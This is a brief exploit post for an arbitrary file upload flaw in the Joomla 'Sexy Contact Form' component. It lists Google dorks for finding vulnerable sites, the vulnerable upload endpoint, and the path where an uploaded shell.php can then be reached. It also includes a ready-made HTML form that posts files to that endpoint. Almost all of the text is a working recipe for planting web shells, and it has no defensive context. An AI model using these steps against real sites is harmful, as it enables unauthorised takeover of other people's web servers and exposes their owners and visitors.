Joomla Sexy contact form Arbitrary File Upload Vulnerability
on
Google Dork: "/components/com_sexycontactform/"
Google Dork: "Powered by sexycontact"
Google Dork: inurl:"sexy-contact-form
Exploit : components/com_sexycontactform/fileupload/index.php
Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php
HTML Upload Source:
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>